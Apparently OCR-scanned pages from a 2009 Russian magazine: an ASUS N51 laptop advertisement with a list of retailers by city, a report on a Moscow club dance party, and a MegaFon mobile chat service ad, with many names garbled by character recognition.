А51І5 N51 V - один из первых ноутбуков, оснащенных технологией 
Зирег НуЬгісІ Епдіпе (ЗНЕ), которая является логичным продолже- 
нием АЗІІЗ Роѵѵег4(Зеаг еХІгете и содержит ее обновленную 
версию АЗІІЗ Роѵ\/ег4Ѳеаг НуЬгісІ, а также аппаратные компоненты. 
В зависимости от требований пользователя ЗНЕ может обеспечи- 
вать повышение производительности или увеличение времени 
автономной работы. Пользователи могут воспользоваться 
предустановленными режимами ЗНЕ и самостоятельно регулиро- 
вать часть параметров. 

Ноутбуки АЗІІЗ серии N оснащены эксклюзивным ПО АЗІІЗ 
Зтаіі І_одоп, позволяющим Вам не вводить пароль для того, чтобы 
начать работу - владелец ноутбука автоматически получит доступ 
к информации после идентификации с помощью веб-камеры. 
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В зависимости от конфигурации системы. 






А8Ц84ѴОІІ (495) 585-80-45; Белый Ветер - ЦИФРОВОЙ (495) 730-30-30; СтартМастер (495) 785-85-55, (800) 555-8-555; РОІ.АКІЗ (Й5) 755-55-57 



Москва: Аваком-М (495) 730-74-54, ЮІЧ (495) 5-444-333, Нотик (495) 231-14-88, Респект (495) 177-40-77, Санрайз (495) 788-80-88, ТРК (495) 739-08-28, ТепГоІсІ Огоир (495) 
580-63-85, ІІЗИ (495) 775-82-02, Ф-Центр (495) 925-64-47, МЕХІІ5 (495) 628-23-67, ОШІ (495) 221-11-11, ПИРИТ (495) 785-55-54, Мерлион (495) 981-84-84, ЕІко 
(495) 234-28-45, Пронет (495) 789-38-46, Юпитер (499) 271-83-50, ОС5 (495) 995-25-75, (812) 324-28-70 

Санкт-Петербург: Цифры (812) 320-80-70, ИВСот (812) 329-70-00, Кей (812) 074, Компьютерный мир (812) 333-00-33, СТР Компьютере (812) 542-45-51 ; Владивосток: ДНО 
(4232) 300-454; Воронеж: РЕТ (4732) 77-93-39; Екатеринбург: Буква (343) 22-22-025, Санрайз (343) 261-39-15; Ижевск: Корпорация «Центр» (3412) 91-88-11; Иркутск: 
ѴѴігагсІ (3952) 258-001; Казань: Ноутбукофф (843) 264-26-01; Киров: Портал (8332) 35-41-07, Технополис (8332) 480-888; Краснодар: Владос (861) 210-10-01, Санрайз 
(861) 210-00-66; Красноярск: Аверс (3912) 560-561, Старком (3912) 49-11-11; Липецк: Регард-тур (4742) 220-555; Новосибирск: НЭТА (383) 216-33-11, Техносити 
(383) 212-53-33, Левел (383) 212-00-05, Готти (383) 362-00-44; Норильск: Юрмала-М (3919) 46-73-36; Омск: Ритм (3812) 23-64-00; Пермь: Ноутбукофф (342) 270-01-11; 
Ростов-на-Дону: Санрайз (863) 240-11-77, Иманго (863) 232-47-18; Самара: Прагма (846) 270-17-01, Санрайз (846) 241-67-53, Сателлит (846) 224-00-00; Саратов: АТТО 
(8452) 444-11 1 ; Томск: Интант (3822) 56-00-56; Тюмень: Арсенал+ (3452) 797-070; Уфа: Кламас (347) 291-21-12, ФортеВД (347) 260-00-00 
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ІпіеІ, логотип ІпіеІ, Селігіло и Сепігіло Іпзісіе 
являются товарными знаками 
корпорации ІпіеІ в США и других странах. 




Событие, которое запомнится надолго! 

20 марта, состоялось самое масштабное событие в российской 
клубной культуре! В столичном клубе Топто НаІІ с успехом 
прогремел долгожданный танцевальный проект 2009 года ■ Рапу 
Гігпе Рвижжение ПРМ, собрав более 4000 поклонников 
танцевальной музыки! 

На разогреве за вертушками всех приветствовал бессменный 
резидент радиостанции ОРМ - Г?) БШ (Большая Танцевальная 
Мышь}. Ведущие С] Вера, Игорь Кокс и Егор Плот никое зарядили 
публику тотальным ураганом позитива] 

VI А 5ігІи*, Море!, 6] Воуко & БоипсІ БМокіпд. Ні-Рі, Олю, Слайд & 
МсотаПет Ш'і, Насти Вадо рож пав. О] Ііттдііт ргеь. Еап Гоосі, 
Ираклий Пирцхалава. ГМ Рго}еа, Света, Е>і РШдгіт, Макс Лоренс & 
Щ Швецовй Ш МІІІег, Серега и его новый эксклюзивный проект РИ 
с невероятным огненным шоу, - сменяли на сцене друг друга л 
режиме поп-йор, и в течение нескольких часов просто не 
позволяли публике стоять на месте! 

Порадовать публику приехали такие мировые и 
востребованные имена клубной сцены, как Іаи Сагеу, СаѵеОасеІІ и 
О] РІПІ5І1, 

Рагіу Типе ІЭпижжение ОРМ уже можно с уверенностью назвать 
одной и? самых; громких и успешных вечеринок этого года. 
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Куда ты - туда и чат 

Новая услуга «Чат» в твоем телефоне. 

Заходи в чат! Здесь все создано для твоего общения. 

Ты можешь общаться с одним собеседником или в группе. 

Прикольные смайлики сделают твое общение ярче, а статусы активности - удобнее. 

В чате можно переписываться даже с абонентами МТС и «Билайн». 

До 1 июля 2009 года ты можешь пользоваться услугой «Чат» от МегаФона БЕСПЛАТНО. 



(?) МЕГАФОН 

^ Будущее зависит от тебя 
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